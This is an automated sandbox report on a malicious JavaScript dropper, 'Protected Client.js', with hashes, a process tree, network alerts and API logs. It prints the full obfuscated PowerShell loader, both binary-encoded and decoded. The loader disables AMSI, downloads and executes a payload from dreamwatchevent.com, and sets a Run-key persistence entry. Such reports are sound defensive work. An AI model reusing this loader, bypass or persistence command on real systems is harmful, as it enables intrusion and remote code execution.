Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 9, 2021, 8 p.m.	Sept. 9, 2021, 8:02 p.m.

Size	17.8KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`b2c47a2918eef35baf623e2e42c5b694`
SHA256	`60de5bef1efff151b9db261a3dd6a9d36ac722d9ed1cd099530a20ec8a6025bb`
CRC32	`D5DF01D1`
ssdeep	`96:VjLsUsZI+PMAm3g2NeH2Fyev29dop0YGr38MRfIsaBlxXa5SXfMIMXD0Y5SXfC7G:tVN+05g2NE2zApW`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Protected Client.js"
2232
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
  2860
  - notepad.exe "C:\WINDOWS\syswow64\notepad.exe"
    2564
- cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js"
  2200
  - reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js"
    1788
- cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\test22\AppData\Local\Temp\Protected Client.js" "C:\Users\test22\AppData\Roaming\" /Y
  776

Name	Response	Post-Analysis Lookup
google.com	A 216.58.200.78	172.217.175.238
freightmgmt.duckdns.org	A 194.5.98.207	194.5.98.207
dreamwatchevent.com	A 144.208.125.220	144.208.125.220

IP Address	Status	Action
144.208.125.220	Active	Moloch
164.124.101.2	Active	Moloch
194.5.98.207	Active	Moloch
216.58.200.78	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 144.208.125.220:80 -> 192.168.56.102:49171	2012398	ET WEB_CLIENT Hex Obfuscation of replace Javascript Function % Encoding	Potentially Bad Traffic
TCP 144.208.125.220:80 -> 192.168.56.102:49171	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
UDP 192.168.56.102:58838 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
TCP 144.208.125.220:80 -> 192.168.56.102:49171	2012398	ET WEB_CLIENT Hex Obfuscation of replace Javascript Function % Encoding	Potentially Bad Traffic
TCP 144.208.125.220:80 -> 192.168.56.102:49171	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.102:49171	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.102:49171	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.102:49171	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.102:49171	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.102:49171	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.102:49171	2013145	ET SHELLCODE Possible %41%41%41%41 Heap Spray Attempt	Executable code was detected
TCP 144.208.125.220:80 -> 192.168.56.102:49171	2012398	ET WEB_CLIENT Hex Obfuscation of replace Javascript Function % Encoding	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.102:49174 194.5.98.207:691	None	None	None

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 9, 2021, 8 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 8 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 8 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 8 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 9, 2021, 8 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 8 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 8 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 8 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 9, 2021, 8 p.m.			0	0

Command line console output was observed (50 out of 53 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: Exception setting "SecurityProtocol": "The requested security protocol is not s console_handle: 0x00000023	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: upported." console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: At line:1 char:217 console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: + '[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartia console_handle: 0x00000047	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: lName(''Microsoft.VisualBasic'')'\|IEX;$t56fg = [Enum]::ToObject([System.Net.Sec console_handle: 0x00000053	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: urityProtocolType], 3072);[System.Net.ServicePointManager]:: <<<< SecurityProto console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: col = $t56fg;$yrtg=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Aut console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: om'+'atio'+'n.A'+'m'+'si'+'Utils').GetField('a'+'ms'+'iI'+'nitFa'+'iled','Non%^ console_handle: 0x00000077	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: '.replace('%^','Pub')+'lic,S'+'tatic');$yrtg.SetValue($null,$true);do {$ping = console_handle: 0x00000083	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'O console_handle: 0x0000008f	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: bje'+'ct Ne'+'t.We'+'bCli'+'ent)'\|I`E`X;$mv= [Microsoft.VisualBasic.Interaction console_handle: 0x0000009b	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: ]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'h console_handle: 0x000000a7	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: ttp://dreamwatchevent.com/.well-known/pki-validation/Attack.jpg');$r78fd000sd= console_handle: 0x000000b3	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: $mv -split '%' \|ForEach-Object {[char][byte]"0x$_"};$y5jh62df0= I`E`X($r78fd000 console_handle: 0x000000bf	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: sd -join '') console_handle: 0x000000cb	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x000000d7	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x000000e3	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000103	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: At line:1 char:352 console_handle: 0x0000010f	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: + '[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartia console_handle: 0x0000011b	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: lName(''Microsoft.VisualBasic'')'\|IEX;$t56fg = [Enum]::ToObject([System.Net.Sec console_handle: 0x00000127	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: urityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = console_handle: 0x00000133	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: $t56fg;$yrtg=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'a console_handle: 0x0000013f	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: tio'+'n.A'+'m'+'si'+'Utils').GetField <<<< ('a'+'ms'+'iI'+'nitFa'+'iled','Non%^ console_handle: 0x0000014b	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: '.replace('%^','Pub')+'lic,S'+'tatic');$yrtg.SetValue($null,$true);do {$ping = console_handle: 0x00000157	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'O console_handle: 0x00000163	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: bje'+'ct Ne'+'t.We'+'bCli'+'ent)'\|I`E`X;$mv= [Microsoft.VisualBasic.Interaction console_handle: 0x0000016f	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: ]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'h console_handle: 0x0000017b	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: ttp://dreamwatchevent.com/.well-known/pki-validation/Attack.jpg');$r78fd000sd= console_handle: 0x00000187	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: $mv -split '%' \|ForEach-Object {[char][byte]"0x$_"};$y5jh62df0= I`E`X($r78fd000 console_handle: 0x00000193	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: sd -join '') console_handle: 0x0000019f	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: + CategoryInfo : InvalidOperation: (GetField:String) [], RuntimeE console_handle: 0x000001ab	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: xception console_handle: 0x000001b7	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x000001c3	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x000001e3	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: At line:1 char:441 console_handle: 0x000001ef	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: + '[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartia console_handle: 0x000001fb	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: lName(''Microsoft.VisualBasic'')'\|IEX;$t56fg = [Enum]::ToObject([System.Net.Sec console_handle: 0x00000207	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: urityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = console_handle: 0x00000213	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: $t56fg;$yrtg=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'a console_handle: 0x0000021f	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: tio'+'n.A'+'m'+'si'+'Utils').GetField('a'+'ms'+'iI'+'nitFa'+'iled','Non%^'.repl console_handle: 0x0000022b	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: ace('%^','Pub')+'lic,S'+'tatic');$yrtg.SetValue <<<< ($null,$true);do {$ping = console_handle: 0x00000237	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'O console_handle: 0x00000243	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: bje'+'ct Ne'+'t.We'+'bCli'+'ent)'\|I`E`X;$mv= [Microsoft.VisualBasic.Interaction console_handle: 0x0000024f	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: ]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'h console_handle: 0x0000025b	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: ttp://dreamwatchevent.com/.well-known/pki-validation/Attack.jpg');$r78fd000sd= console_handle: 0x00000267	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: $mv -split '%' \|ForEach-Object {[char][byte]"0x$_"};$y5jh62df0= I`E`X($r78fd000 console_handle: 0x00000273	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: sd -join '') console_handle: 0x0000027f	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: + CategoryInfo : InvalidOperation: (SetValue:String) [], RuntimeE console_handle: 0x0000028b	1	1
WriteConsoleW Sept. 9, 2021, 8 p.m.	buffer: xception console_handle: 0x00000297	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 51 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00584010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583f50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00583710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0062bd48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0062bd48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0062bd48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 8:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0062bd48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 9, 2021, 8 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://dreamwatchevent.com/.well-known/pki-validation/Attack.jpg

Connects to a Dynamic DNS Domain (1 event)

domain

freightmgmt.duckdns.org

Performs some HTTP requests (1 event)

request

